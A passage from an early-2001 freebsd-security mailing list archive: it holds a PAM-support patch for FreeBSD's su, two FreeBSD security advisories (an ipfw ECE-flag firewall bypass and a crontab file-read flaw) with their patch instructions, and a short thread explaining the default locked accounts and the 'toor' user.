PAM_SUCCESS) { - syslog(LOG_ERR, "pam_end: %s", pam_strerror(pamh, e)); - rval = -1; + + if (rval != -1) { + e = pam_acct_mgmt(pamh, 0); + if (e == PAM_NEW_AUTHTOK_REQD) { + e = pam_chauthtok(pamh, PAM_CHANGE_EXPIRED_AUTHTOK); + if (e != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_chauthtok: %s", pam_strerror(pamh, e)); + rval = -1; + } + } else if (e != PAM_SUCCESS) { + rval = 1; + } + } + + if (rval == -1) { + if ((e = pam_end(pamh, e)) != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_end: %s", pam_strerror(pamh, e)); + } + pamh = NULL; } return rval; } -#endif /* NO_PAM */ +#endif /* USE_PAM */ static void usage() @@ -745,7 +824,7 @@ /* * Allow for authentication style and/or kerberos instance - * */ + */ #define NBUFSIZ UT_NAMESIZE + 64 --- ./usr.bin/su/Makefile 2001/01/16 21:33:47 1.1 +++ ./usr.bin/su/Makefile 2001/01/23 18:07:48 @@ -4,9 +4,18 @@ PROG= su SRCS= su.c -COPTS+= -DLOGIN_CAP -DSKEY -DPADD= ${LIBUTIL} ${LIBSKEY} ${LIBMD} ${LIBCRYPT} -LDADD= -lutil -lskey -lmd -lcrypt +DPADD+= ${LIBUTIL} +LDADD+= -lutil + +.if !defined(NOPAM) +CFLAGS+= -DUSE_PAM +DPADD+= ${LIBPAM} +LDADD+= ${MINUSLPAM} +.else +COPTS+= -DSKEY +DPADD+= ${LIBSKEY} ${LIBMD} ${LIBCRYPT} +LDADD+= -lskey -lmd -lcrypt +.endif .if defined(WHEELSU) COPTS+= -DWHEELSU --- ./usr.bin/su/su.1 2001/01/23 01:02:52 1.1 +++ ./usr.bin/su/su.1 2001/01/23 01:16:33 @@ -173,6 +173,13 @@ .Bl -tag -width /etc/auth.conf -compact .It Pa /etc/auth.conf configure authentication services +.It Pa /etc/pam.conf +if +.Nm +is configured with PAM support, it uses +.Pa /etc/pam.conf +entries with service name +.Dq su .El .Sh SEE ALSO .Xr csh 1 , --- ./usr.bin/su/su.c 2000/02/24 21:06:21 1.1 +++ ./usr.bin/su/su.c 2001/01/23 18:05:14 @@ -60,36 +60,40 @@ #include #include #include - -#ifdef LOGIN_CAP #include -#endif +#ifdef USE_PAM +#include +#include +#include +#include +#define PAM_END { \ + if ((retcode = pam_setcred(pamh, PAM_DELETE_CRED)) != PAM_SUCCESS) { \ + syslog(LOG_ERR, "pam_setcred: %s", pam_strerror(pamh, retcode)); \ + } \ + if ((retcode = pam_end(pamh,retcode)) != PAM_SUCCESS) { \ + syslog(LOG_ERR, "pam_end: %s", pam_strerror(pamh, retcode)); \ + } \ +} +#else /* !USE_PAM */ #ifdef SKEY #include #endif +#endif /* USE_PAM */ #ifdef KERBEROS #include #include #include -#ifdef LOGIN_CAP #define ARGSTR "-Kflmc:" -#else -#define ARGSTR "-Kflm" -#endif static int kerberos(char *username, char *user, int uid, char *pword); static int koktologin(char *name, char *toname); int use_kerberos = 1; #else /* !KERBEROS */ -#ifdef LOGIN_CAP #define ARGSTR "-flmc:" -#else -#define ARGSTR "-flm" -#endif #endif /* KERBEROS */ char *ontty __P((void)); @@ -107,17 +111,26 @@ char *targetpass; int iswheelsu; #endif /* WHEELSU */ - char *p, **g, *user, *shell=NULL, *username, **cleanenv, **nargv, **np; - struct group *gr; + char *p, *user, *shell=NULL, *username, *cleanenv = NULL, **nargv, **np; uid_t ruid; gid_t gid; int asme, ch, asthem, fastlogin, prio, i; enum { UNSET, YES, NO } iscsh = UNSET; -#ifdef LOGIN_CAP login_cap_t *lc; char *class=NULL; int setwhat; -#endif +#ifdef USE_PAM + int retcode; + pam_handle_t *pamh = NULL; + struct pam_conv conv = { misc_conv, NULL }; + char myhost[MAXHOSTNAMELEN + 1], *mytty; + int statusp=0; + int child_pid, child_pgrp, ret_pid; + const char * const *env; +#else /* !USE_PAM */ + char **g; + struct group *gr; +#endif /* USE_PAM */ #ifdef KERBEROS char *k; #endif @@ -147,11 +160,9 @@ asme = 1; asthem = 0; break; -#ifdef LOGIN_CAP case 'c': class = optarg; break; -#endif case '?': default: usage(); @@ -161,8 +172,7 @@ user = argv[optind++]; if (strlen(user) > MAXLOGNAME - 1) { - (void)fprintf(stderr, "su: username too long.\n"); - exit(1); + errx(1, "username too long"); } if (user == NULL) @@ -189,7 +199,7 @@ if (errno) prio = 0; (void)setpriority(PRIO_PROCESS, 0, -2); - openlog("su", LOG_CONS, 0); + openlog("su", LOG_CONS, LOG_AUTH); /* get current login name and shell */ ruid = getuid(); @@ -214,11 +224,67 @@ } } +#ifdef USE_PAM + retcode = pam_start("su", user, &conv, &pamh); + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_start: %s", pam_strerror(pamh, retcode)); + errx(1, "pam_start: %s", pam_strerror(pamh, retcode)); + } + + gethostname(myhost, sizeof(myhost)); + retcode = pam_set_item(pamh, PAM_RHOST, myhost); + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_set_item(PAM_RHOST): %s", pam_strerror(pamh, retcode)); + pam_end(pamh, retcode); + errx(1, "pam_set_item(PAM_RHOST): %s", pam_strerror(pamh, retcode)); + } + + mytty = ttyname(STDERR_FILENO); + if (!mytty) + mytty = "tty"; + retcode = pam_set_item(pamh, PAM_TTY, mytty); + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_set_item(PAM_TTY): %s", pam_strerror(pamh, retcode)); + pam_end(pamh, retcode); + errx(1, "pam_set_item(PAM_TTY): %s", pam_strerror(pamh, retcode)); + } + + if (ruid) { + retcode = pam_authenticate(pamh, 0); + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_authenticate: %s", pam_strerror(pamh, retcode)); + pam_end(pamh, retcode); + errx(1, "Sorry"); + } + + if ((retcode = pam_get_item(pamh, PAM_USER, (const void **) &p)) == PAM_SUCCESS) { + user = p; + } else + syslog(LOG_ERR, "pam_get_item(PAM_USER): %s", + pam_strerror(pamh, retcode)); + + retcode = pam_acct_mgmt(pamh, 0); + if (retcode == PAM_NEW_AUTHTOK_REQD) { + retcode = pam_chauthtok(pamh, PAM_CHANGE_EXPIRED_AUTHTOK); + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_chauthtok: %s", pam_strerror(pamh, retcode)); + pam_end(pamh, retcode); + errx(1, "Sorry"); + } + } + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_acct_mgmt: %s", pam_strerror(pamh, retcode)); + pam_end(pamh, retcode); + errx(1, "Sorry"); + } + } + +#endif /* USE_PAM */ + /* get target login information, default to root */ if ((pwd = getpwnam(user)) == NULL) { errx(1, "unknown login: %s", user); } -#ifdef LOGIN_CAP if (class==NULL) { lc = login_getpwclass(pwd); } else { @@ -228,8 +294,8 @@ if (lc == NULL) errx(1, "unknown class: %s", class); } -#endif +#ifndef USE_PAM #ifdef WHEELSU targetpass = strdup(pwd->pw_passwd); #endif /* WHEELSU */ @@ -280,18 +346,18 @@ #ifdef WHEELSU || (iswheelsu && !strcmp(targetpass, crypt(p,targetpass))) #endif /* WHEELSU */ - )) { -#else + )) +#else /* !SKEY */ p = getpass("Password:"); - if (strcmp(pwd->pw_passwd, crypt(p, pwd->pw_passwd))) { -#endif + if (strcmp(pwd->pw_passwd, crypt(p, pwd->pw_passwd))) +#endif /* SKEY */ + { #ifdef KERBEROS if (!use_kerberos || (use_kerberos && kerberos(username, user, pwd->pw_uid, p))) #endif - { - fprintf(stderr, "Sorry\n"); + { syslog(LOG_AUTH|LOG_WARNING, "BAD SU %s to %s%s", username, user, ontty()); - exit(1); + errx(1, "Sorry"); } } #ifdef WHEELSU @@ -301,17 +367,17 @@ #endif /* WHEELSU */ } if (pwd->pw_expire && time(NULL) >= pwd->pw_expire) { - fprintf(stderr, "Sorry - account expired\n"); syslog(LOG_AUTH|LOG_WARNING, "BAD SU %s to %s%s", username, user, ontty()); - exit(1); + errx(1, "Sorry - account expired"); } } +#endif /* USE_PAM */ if (asme) { /* if asme and non-standard target shell, must be root */ - if (!chshell(pwd->pw_shell) && ruid) + if (ruid && !chshell(pwd->pw_shell)) errx(1, "permission denied (shell)."); } else if (pwd->pw_shell && *pwd->pw_shell) { shell = pwd->pw_shell; @@ -334,9 +400,51 @@ (void)setpriority(PRIO_PROCESS, 0, prio); -#ifdef LOGIN_CAP + /* + * PAM modules might add supplementary groups in + * pam_setcred(), so initialize them first. + */ + if (setusercontext(lc, pwd, pwd->pw_uid, LOGIN_SETGROUP) < 0) + err(1, "setusercontext"); + +#ifdef USE_PAM + retcode = pam_setcred(pamh, PAM_ESTABLISH_CRED); + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_setcred: %s", pam_strerror(pamh, retcode)); + } + + /* + * We must fork() before setuid() because we need to call + * pam_setcred(pamh, PAM_DELETE_CRED) as root. + */ + + statusp = 1; + switch ((child_pid = fork())) { + default: + while ((ret_pid = waitpid(child_pid, &statusp, WUNTRACED)) != -1) { + if (WIFSTOPPED(statusp)) { + child_pgrp = tcgetpgrp(1); + kill(getpid(), SIGSTOP); + tcsetpgrp(1, child_pgrp); + kill(child_pid, SIGCONT); + statusp = 1; + continue; + } + break; + } + if (ret_pid == -1) + err(1, "waitpid"); + PAM_END; + exit(statusp); + case -1: + err(1, "fork"); + PAM_END; + exit (1); + case 0: +#endif /* USE_PAM */ + /* Set everything now except the environment & umask */ - setwhat = LOGIN_SETUSER|LOGIN_SETGROUP|LOGIN_SETRESOURCES|LOGIN_SETPRIORITY; + setwhat = LOGIN_SETUSER|LOGIN_SETRESOURCES|LOGIN_SETPRIORITY; /* * Don't touch resource/priority settings if -m has been * used or -l and -c hasn't, and we're not su'ing to root. @@ -345,15 +453,6 @@ setwhat &= ~(LOGIN_SETPRIORITY|LOGIN_SETRESOURCES); if (setusercontext(lc, pwd, pwd->pw_uid, setwhat) < 0) err(1, "setusercontext"); -#else - /* set permissions */ - if (setgid(pwd->pw_gid) < 0) - err(1, "setgid"); - if (initgroups(user, pwd->pw_gid)) - errx(1, "initgroups failed"); - if (setuid(pwd->pw_uid) < 0) - err(1, "setuid"); -#endif if (!asme) { if (asthem) { @@ -361,16 +460,9 @@ #ifdef KERBEROS k = getenv("KRBTKFILE"); #endif - if ((cleanenv = calloc(20, sizeof(char*))) == NULL) - errx(1, "calloc"); - cleanenv[0] = NULL; - environ = cleanenv; -#ifdef LOGIN_CAP + environ = &cleanenv; /* set the su'd user's environment & umask */ setusercontext(lc, pwd, pwd->pw_uid, LOGIN_SETPATH|LOGIN_SETUMASK|LOGIN_SETENV); -#else - (void)setenv("PATH", _PATH_DEFPATH, 1); -#endif if (p) (void)setenv("TERM", p, 1); #ifdef KERBEROS @@ -385,6 +477,17 @@ (void)setenv("HOME", pwd->pw_dir, 1); (void)setenv("SHELL", shell, 1); } + + login_close(lc); + +#ifdef USE_PAM + env = (const char * const *)pam_getenvlist(pamh); + if (env != NULL) { + for (i=0; env[i]; i++) + putenv(env[i]); + } +#endif /* USE_PAM */ + if (iscsh == YES) { if (fastlogin) *np-- = "-f"; @@ -396,20 +499,20 @@ *np = asthem ? "-su" : iscsh == YES ? "_su" : "su"; if (ruid != 0) - syslog(LOG_NOTICE|LOG_AUTH, "%s to %s%s", + syslog(LOG_NOTICE, "%s to %s%s", username, user, ontty()); - login_close(lc); - execv(shell, np); err(1, "%s", shell); +#ifdef USE_PAM + } +#endif /* USE_PAM */ } static void usage() { - (void)fprintf(stderr, "usage: su [%s] [login [args]]\n", ARGSTR); - exit(1); + errx(1, "usage: su [%s] [login [args]]", ARGSTR); } int @@ -493,7 +596,7 @@ return (1); } warnx("kerberos: unable to su: %s", krb_err_txt[kerno]); - syslog(LOG_NOTICE|LOG_AUTH, + syslog(LOG_NOTICE, "BAD Kerberos SU: %s to %s%s: %s", username, user, ontty(), krb_err_txt[kerno]); return (1); @@ -520,13 +623,13 @@ if (kerno == KDC_PR_UNKNOWN) { warnx("Warning: TGT not verified."); - syslog(LOG_NOTICE|LOG_AUTH, + syslog(LOG_NOTICE, "%s to %s%s, TGT not verified (%s); %s.%s not registered?", username, user, ontty(), krb_err_txt[kerno], "rcmd", savehost); } else if (kerno != KSUCCESS) { warnx("Unable to use TGT: %s", krb_err_txt[kerno]); - syslog(LOG_NOTICE|LOG_AUTH, "failed su: %s to %s%s: %s", + syslog(LOG_NOTICE, "failed su: %s to %s%s: %s", username, user, ontty(), krb_err_txt[kerno]); dest_tkt(); return (1); @@ -540,9 +643,9 @@ if ((kerno = krb_rd_req(&ticket, "rcmd", savehost, faddr, &authdata, "")) != KSUCCESS) { - warnx("kerberos: unable to verify rcmd ticket: %s\n", + warnx("kerberos: unable to verify rcmd ticket: %s", krb_err_txt[kerno]); - syslog(LOG_NOTICE|LOG_AUTH, + syslog(LOG_NOTICE, "failed su: %s to %s%s: %s", username, user, ontty(), krb_err_txt[kerno]); dest_tkt(); To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 10:50:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 27C3837B404 for ; Tue, 23 Jan 2001 10:50:04 -0800 (PST) Received: from hamlet.nectar.com (hamlet.nectar.com [10.0.1.102]) by gw.nectar.com (Postfix) with ESMTP id 522B0193E4; Tue, 23 Jan 2001 12:50:03 -0600 (CST) Received: (from nectar@localhost) by hamlet.nectar.com (8.11.1/8.9.3) id f0NIo3N24571; Tue, 23 Jan 2001 12:50:03 -0600 (CST) (envelope-from nectar@spawn.nectar.com) Date: Tue, 23 Jan 2001 12:50:03 -0600 From: "Jacques A. Vidrine" To: "David J. MacKenzie" Cc: freebsd-security@freebsd.org Subject: Re: Fwd: [PAM broken design? pam_setcred] Message-ID: <20010123125002.A24538@hamlet.nectar.com> Mail-Followup-To: "Jacques A. Vidrine" , "David J. MacKenzie" , freebsd-security@freebsd.org References: <20010123183944.4A4C83E5B@catapult.web.us.uu.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010123183944.4A4C83E5B@catapult.web.us.uu.net>; from djm@web.us.uu.net on Tue, Jan 23, 2001 at 01:39:44PM -0500 X-Url: http://www.nectar.com/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Jan 23, 2001 at 01:39:44PM -0500, David J. MacKenzie wrote: > > I forwarded your example to the Linux-PAM maintainters, and got back > a reply favoring the approach you intuitively expect; to save the > pam_sm_authenticate() results and call the same modules' pam_sm_setcred() > functions. > > The bug report is in the tracking system at: > > http://sourceforge.net/bugs/?func=detailbug&bug_id=129775&group_id=6663 Thanks much for following this up, David. I had been aware of the bug since November (when I first mailed the PAM maintainer about it), but I had too much above it in my TODO list to look after it :-( Hopefully this will be fixed and then we can import it. Or maybe _you_ could import it, *hint* *hint* Cheers, -- Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 13: 8:57 2001 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 349E837B402; Tue, 23 Jan 2001 13:08:23 -0800 (PST) From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory: FreeBSD-SA-01:08.ipfw Reply-To: security-advisories@freebsd.org Message-Id: <20010123210823.349E837B402@hub.freebsd.org> Date: Tue, 23 Jan 2001 13:08:23 -0800 (PST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:08 Security Advisory FreeBSD, Inc. Topic: ipfw/ip6fw allows bypassing of 'established' keyword Category: core Module: kernel Announced: 2001-01-23 Credits: Aragon Gouveia Affects: FreeBSD 3.x (all releases), FreeBSD 4.x (all releases), FreeBSD 3.5-STABLE and 4.2-STABLE prior to the correction date. Corrected: 2001-01-09 (FreeBSD 4.2-STABLE) 2001-01-12 (FreeBSD 3.5-STABLE) FreeBSD only: Yes I. Background ipfw is a system facility which allows IP packet filtering, redirecting, and traffic accounting. ip6fw is the corresponding utility for IPv6 networks, included in FreeBSD 4.0 and above. It is based on an old version of ipfw and does not contain as many features. II. Problem Description Due to overloading of the TCP reserved flags field, ipfw and ip6fw incorrectly treat all TCP packets with the ECE flag set as being part of an established TCP connection, which will therefore match a corresponding ipfw rule containing the 'established' qualifier, even if the packet is not part of an established connection. The ECE flag is not believed to be in common use on the Internet at present, but is part of an experimental extension to TCP for congestion notification. At least one other major operating system will emit TCP packets with the ECE flag set under certain operating conditions. Only systems which have enabled ipfw or ip6fw and use a ruleset containing TCP rules which make use of the 'established' qualifier, such as "allow tcp from any to any established", are vulnerable. The exact impact of the vulnerability on such systems is undetermined and depends on the exact ruleset in use. All released versions of FreeBSD prior to the correction date including FreeBSD 3.5.1 and FreeBSD 4.2 are vulnerable, but it was corrected prior to the (future) release of FreeBSD 4.3. III. Impact Remote attackers who construct TCP packets with the ECE flag set may bypass certain ipfw rules, allowing them to potentially circumvent the firewall. IV. Workaround Because the vulnerability only affects 'established' rules and ECE- flagged TCP packets, this vulnerability can be removed by adjusting the system's rulesets. In general, it is possible to express most 'established' rules in terms of a general TCP rule (with no TCP flag qualifications) and a 'setup' rule, but may require some restructuring and renumbering of the ruleset. V. Solution One of the following: 1) Upgrade the vulnerable FreeBSD system to FreeBSD 3.5-STABLE, or or 4.2-STABLE after the correction date. 2) Patch your present system by downloading the relevant patch from the below location: [FreeBSD 4.x] # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:08/ipfw-4.x.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:08/ipfw-4.x.patch.asc [FreeBSD 3.x] # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:08/ipfw-3.x.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:08/ipfw-3.x.patch.asc Verify the detached PGP signature using your PGP utility. Execute the following commands as root: # cd /usr/src # patch -p < /path/to/patch # cp /usr/src/sys/netinet/tcp.h /usr/src/sys/netinet/ip_fw.h /usr/include/netinet/ # cd /usr/src/sbin/ipfw # make depend && make all install # cd /usr/src/sys/modules/ipfw # make depend && make all install For 4.x systems, perform the following additional steps: # cp /usr/src/sys/netinet6/ip6_fw.h /usr/include/netinet6/ # cd /usr/src/sbin/ip6fw # make depend && make all install # cd /usr/src/sys/modules/ip6fw # make depend && make all install NOTE: The ip6fw patches have not yet been tested but are believed to be correct. The ip6fw software is not currently maintained and may be removed in a future release. If the system is using the ipfw or ip6fw kernel modules (see kldstat(8)), the module may be unloaded and the corrected module loaded into the kernel using kldload(8)/kldunload(8). This will require that the firewall rules be reloaded, usually be executing the /etc/rc.firewall script. Because the loading of the ipfw or ip6fw module will result in the system denying all packets by default, this should only be attempted when accessing the system via console or by careful use of a command such as: # kldload ipfw && sh /etc/rc.firewall which performs both operations sequentially. Otherwise, if the system has ipfw or ip6fw compiled into the kernel, the kernel will also have to be recompiled and installed, and the system will have to be rebooted for the changes to take effect. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOm3yulUuHi5z0oilAQEJbQP+Nf6JEKNUz0bOhgOYmY0DDCQNbY/2dlxA Qhs59HSB9Y7cwP+NuFKhix2fii8Y5oSOxjfMhllRl0yIQMHloG6orXNBuYJQ++d5 A/e+eoePNTzTo7kbaEZyvS3pGBodkueUmnKAqT9Ho/SGY00p4/JxpNcp3KuYT4Re gyKXSFV3rkQ= =7XOn -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 13:22: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 18D8D37B69B; Tue, 23 Jan 2001 13:21:26 -0800 (PST) From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory: FreeBSD-SA-01:09.crontab Reply-To: security-advisories@freebsd.org Message-Id: <20010123212126.18D8D37B69B@hub.freebsd.org> Date: Tue, 23 Jan 2001 13:21:26 -0800 (PST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:09 Security Advisory FreeBSD, Inc. Topic: crontab allows users to read certain files Category: core Module: crontab Announced: 2001-01-23 Credits: Kyong-won Cho Affects: FreeBSD 3.x (all releases), 4.x (all releases prior to 4.2) FreeBSD 3.5.1-STABLE and 4.1.1-STABLE prior to the correction date. Corrected: 2000-11-11 (FreeBSD 4.1.1-STABLE) 2000-11-20 (FreeBSD 3.5.1-STABLE) FreeBSD only: No I. Background crontab(8) is a program to edit crontab(5) files for use by the cron daemon, which schedules jobs to run at specified times. II. Problem Description crontab(8) was discovered to contain a vulnerability that may allow local users to read any file on the system that conform to a valid crontab(5) file syntax. Due to crontab(5) syntax requirements, the files that may be read is limited and subject to the following restrictions: * The file is a valid crontab(5) file, or: * The file is entirely commented out; every line contains either only whitespace, or begins with a '#' character. The greatest security vulnerability is the disclosure of crontab entries owned by other users, which may contain sensitive data such as keying material (although this would often be publically disclosed anyway at the time when the crontab job executes, via process arguments and environment, etc). All released versions of FreeBSD prior to the correction date including FreeBSD 4.1.1 are vulnerable to this problem. The problem was corrected prior to the release of FreeBSD 4.2. III. Impact Malicious local users can read arbitrary local files that conform to a valid crontab file syntax. IV. Workaround One of the following: 1) Utilize crontab allow/deny files (/var/cron/allow and /var/cron/deny) to limit access to use the crontab(8) utility. 2) Remove the setuid privileges from /usr/sbin/crontab. However, this will not allow users other than root to use cron. V. Solution One of the following: Upgrade the vulnerable FreeBSD system to 3.5-STABLE or 4.1.1-STABLE after the correction date. To patch your present system: download the relavent patch from the below location and execute the following commands as root: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:09/crontab-4.x.patch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:09/crontab-4.x.patch.asc Verify the detached PGP signature using your PGP utility. # cd /usr/src/usr.sbin/cron/crontab # patch -p < /path/to/patch # make depend && make all install -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOm32m1UuHi5z0oilAQGA+QQAhArbkzv/lo8QibLjyEFB3lta0IC5HSrJ hPuetiP/XViZNXntIAtm26M9QGRAhw0M1s9CU6PGD0zVJHtfh/nRoNxdU9vFLhJ6 xbJf6Wai6VTJpQK7dwXKIi6nplKlOSLhd6ZhvP1fe/6bDsbYywOxJdYGJZcyKtFA vG1n8lhzhog= =EJ7/ -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 13:24:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from relay1.pair.com (relay1.pair.com [209.68.1.20]) by hub.freebsd.org (Postfix) with SMTP id 58E8E37B404 for ; Tue, 23 Jan 2001 13:24:27 -0800 (PST) Received: (qmail 18805 invoked from network); 23 Jan 2001 21:24:24 -0000 Received: from sanpedro-a121.racsa.co.cr (HELO aristoteles.local.galileo.or.cr) (196.40.40.122) by relay1.pair.com with SMTP; 23 Jan 2001 21:24:24 -0000 X-pair-Authenticated: 196.40.40.122 From: Guillermo Leandro Organization: =?iso-8859-1?q?Fundaci=F3n=20Galileo?= To: freebsd-security@FreeBSD.ORG, freebsd-hackers@FreeBSD.ORG Subject: Default users and the passwords Date: Tue, 23 Jan 2001 15:24:40 -0600 X-Mailer: KMail [version 1.1.99] Content-Type: text/plain; charset="iso-8859-1" MIME-Version: 1.0 Message-Id: <01012315244000.00612@aristoteles.local.galileo.or.cr> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi everybody! FreeBSD, like almost all Unix OS, has other default users, like uucp, operator, etc. Since this users cames with the FreeBSD distribution, where can I find their passwords? Another thing, why is there another uid 0 called toor? Isn't it a potential security hole? Thank very much. -- Guillermo Leandro, FUNDACIÓN GALILEO Correo electrónico: guille@galileo.or.cr Sitio: http://www.galileo.or.cr Tel. (506) 280 8683, telefax. (506) 280 8847 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 13:31:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from faith.cs.utah.edu (faith.cs.utah.edu [155.99.198.108]) by hub.freebsd.org (Postfix) with ESMTP id C29C337B698; Tue, 23 Jan 2001 13:31:11 -0800 (PST) Received: (from danderse@localhost) by faith.cs.utah.edu (8.9.3/8.9.3) id OAA10865; Tue, 23 Jan 2001 14:31:07 -0700 (MST) Message-Id: <200101232131.OAA10865@faith.cs.utah.edu> Subject: Re: Default users and the passwords To: guille@galileo.or.cr (Guillermo Leandro) Date: Tue, 23 Jan 2001 14:31:07 -0700 (MST) Cc: freebsd-security@FreeBSD.ORG, freebsd-hackers@FreeBSD.ORG In-Reply-To: <01012315244000.00612@aristoteles.local.galileo.or.cr> from "Guillermo Leandro" at Jan 23, 2001 03:24:40 PM From: "David G. Andersen" X-Mailer: ELM [version 2.5 PL2] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Lo and behold, Guillermo Leandro once said: > > Hi everybody! > > FreeBSD, like almost all Unix OS, has other default users, like uucp, > operator, etc. Since this users cames with the FreeBSD distribution, where > can I find their passwords? They don't have passwords. /etc/master.passwd > Another thing, why is there another uid 0 called toor? Isn't it a potential > security hole? It doesn't have a password. It just has a different shell. No, it's not a potential security hole. If you don't like it, delete it with vipw. -Dave -- work: dga@lcs.mit.edu me: dga@pobox.com MIT Laboratory for Computer Science http://www.angio.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 13:35: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from hex.databits.net (hex.databits.net [207.29.192.16]) by hub.freebsd.org (Postfix) with SMTP id 37C3037B69E for ; Tue, 23 Jan 2001 13:34:49 -0800 (PST) Received: (qmail 89604 invoked by uid 1001); 23 Jan 2001 21:36:05 -0000 Date: Tue, 23 Jan 2001 16:36:05 -0500 From: Pete Fritchman To: Guillermo Leandro Cc: freebsd-security@FreeBSD.org Subject: Re: Default users and the passwords Message-ID: <20010123163605.A89275@databits.net> References: <01012315244000.00612@aristoteles.local.galileo.or.cr> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5i In-Reply-To: <01012315244000.00612@aristoteles.local.galileo.or.cr>; from guille@galileo.or.cr on Tue, Jan 23, 2001 at 03:24:40PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [ removed -hackers ] ++ 23/01/01 15:24 -0600 - Guillermo Leandro: >Hi everybody! > >FreeBSD, like almost all Unix OS, has other default users, like uucp, >operator, etc. Since this users cames with the FreeBSD distribution, where >can I find their passwords? As root, 'less /etc/master.passwd' (note - you should not edit this file directly, see the vipw(8) utility). Their password is '*' by default, which translates to being locked (ie: no crypt()'d password will EVER be a '*'). > >Another thing, why is there another uid 0 called toor? Isn't it a potential >security hole? No. Like the other default users, the 'toor' account is locked by default. IIRC, the purpose of toor is to have a different shell for root (ie: zsh, bash, etc). It's probably a bad idea to change root's shell unless you know what you are doing (you don't want to lock yourself out by accidentally specifying a wrong shell). I guess it's really not important anymore since you can specify a shell for single user mode, but it used to be a good idea to have root's shell statically compiled (in case you need to be root in single user, and /usr is on another partition that's not mounted, etc). So - if you prefer another shell, 'chsh -s /path/to/new/shell toor' and 'passwd toor'. It should probably be a different password than root, just for security's sake. Good luck. -pete > >Thank very much. >-- >Guillermo Leandro, FUNDACIÓN GALILEO >Correo electrónico: guille@galileo.or.cr >Sitio: http://www.galileo.or.cr >Tel. (506) 280 8683, telefax. (506) 280 8847 >[...] -- Pete Fritchman Databits Network Services, Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 13:48:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 73F4637B69C for ; Tue, 23 Jan 2001 13:48:31 -0800 (PST) Received: from hamlet.nectar.com (hamlet.nectar.com [10.0.1.102]) by gw.nectar.com (Postfix) with ESMTP id 6B913193E4 for ; Tue, 23 Jan 2001 15:48:29 -0600 (CST) Received: (from nectar@localhost) by hamlet.nectar.com (8.11.1/8.9.3) id f0NLmTe74752 for freebsd-security@freebsd.org; Tue, 23 Jan 2001 15:48:29 -0600 (CST) (envelope-from nectar@spawn.nectar.com) Date: Tue, 23 Jan 2001 15:48:29 -0600 From: "Jacques A. Vidrine" To: freebsd-security@freebsd.org Subject: Re: cvs commit: src/usr.bin/login login.c Message-ID: <20010123154829.A74738@hamlet.nectar.com> Mail-Followup-To: "Jacques A. 